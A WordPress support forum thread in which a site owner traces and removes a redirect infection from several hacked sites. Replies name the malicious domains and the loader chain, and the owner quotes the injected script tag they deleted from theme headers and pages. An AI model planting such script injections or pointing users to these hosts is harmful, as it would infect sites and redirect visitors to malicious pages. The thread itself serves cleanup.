Locating file on hacked website

  • Resolved Prolet

    (@prolet)


    6 years, 2 months ago

    Hello all!

    Before everything I’d like to say that I will probably use terms which are not right and my questions will be not so sophisticated, but I am stuck in a situation.

    Therefore, please excuse my poor explanation!

    I have 4 website and all of them were hacked. My sites were automatically redirecting to another URL – a page asking for permission to carry on, to press buttons – allow or not … etc.

    The hack came from membership plugin ultimatemembership. It turns out I am not the only one who has problems.

    All files with ‘head’ and ‘query’ in their names are compromised. I.ve managed to clean 3 websites and now I am stuck with the 4th.

    I removed the link and now my website loads properly like there is no problem.

    And here is the problem.

    Sucury check says I am still hacked – https://sitecheck.sucuri.net/results/pumpkinads.co.uk

    With AwSnap I see where is the hack ( is that the right word? ) – https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cHVtcGtbbnwjcy5eXS51aw%3D%3D~enc

    On line 598 is the URL of the baddies – https://pr.uustoughtonma.org

    Probably the savvy one will find more in the file, I am looking only for the obvious … without even to know if is proper to post the whole file as I did …

    There is another info too – https://isithacked.com/check/pumpkinads.co.uk

    I did change the WP files, I did follow all recommendation but I can’t stay more calm, because I actually don’t know which file is this? The file from AwSnap? Where to find it, please?

    As much as obvious it looks, I have no idea how https://pumpkinads.co.uk will give me all this < !DOCTYPE html> info.

    Can you advice, please?

    Thank you so much!

    The page I need help with: [log in to see the link]

Viewing 8 replies - 1 through 8 (of 8 total)

  • This is infection indeed.

    We cannot provide you concrete details where cure infection as it requires internal (server side) investigation of website/WordPress.

    The injected JavaScript firstly going to https[://]pr[.]uustoughtonma[.]org/d.js which downloads https://stat[.]uustoughtonma.org/stats%5B.%5Djs?f=pr that finally loads cookie based redirection malware (firing every 8 hours) redirecting to

    http[://]konado[.]space/?h=475053016_949e154f16a_100&h_l=&h_5=sub_id_2&h_2=def_sub

    You have to perform a full internal website audit to locate and remove the malicious code injecting this malware.

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Further to Quttera’s advice, get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter Prolet

    (@prolet)

    Dear Quttera and Andrew Nevin,

    Thank you for your support!

    Andrew, these two links are my constant helpers. I am reading all the time. And this is how I cleaned my 3 other websites!

    On this one I can’t! Wordfence is 100 % sure there is nothing to worry about ( Thank you for that! How to rely on this plugin at all?) while sucury is panicking me all the time.

    I just found out ( for my embarrassment) the if I use the code editor on the server I will have the Doctype files…. I used the text edit only.

    And yet, I have no idea how to locate the file which gives the full content of the URL.

    Quttera, I will do that a full audit as you suggested!

    Thread Starter Prolet

    (@prolet)

    Problem solved.

    Thread Starter Prolet

    (@prolet)

    Solved

    How did you solve this problem?I have the same problem,thank you

    Thread Starter Prolet

    (@prolet)

    Dear nirolee,

    It was a long and chaotic process. I will share with you everything I did but not in the step-by-step order.

    Apparently the problem was because of plugin ultimate membership. I deleted it and no change.

    It turns out that all my 4 websites were affected plus another one which is on a ubuntu server. All of them had the same problem.

    – I deleted ultimate membership files. I even deleted everything related to it in the database.
    – I deleted all wp files and folders ( except wp-content, wp-config and .htaccess) and uploaded all new wp
    – I scanned all with Wordfence and repaired all files as suggested
    – I deleted this <script type=’text/javascript’ src=’https://stat.uustoughtonma.org/stats.js?f=4&#8242; which was between <header> and </header> in header.html file in EVERY THEME you have!
    – I deleted a similar script text AFTER the </header> tag in the same files.

    Eventually I was able to load the websites without the nasty redirection but when I was logged in I had the same problem.

    Every time I open a dashboard I will have the redirection again.

    It turns out that in the end of every page there was the same script too. I deleted it all page by page.

    Also in .htacces I found this:

    <Files 403.shtml>
    order allow,deny
    allow from all
    </Files>

    Every article I read about it suggest that this is a bad hack. Only one article suggested that it is a security code either from the server either from a security plugin.

    My hosting company said they have no idea what this is and i deleted it. It didn’t harm any of the websites but probably helped the whole process of getting rid of the hack.

    After all of that I can load the websites and work in the background without visible problems.

    I hope this will help you!

    Bon chance!

    Thread Starter Prolet

    (@prolet)

    I forgot to tell you that you must change all wp core themes. Especially take care of 2017.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘Locating file on hacked website’ is closed to new replies.

Tags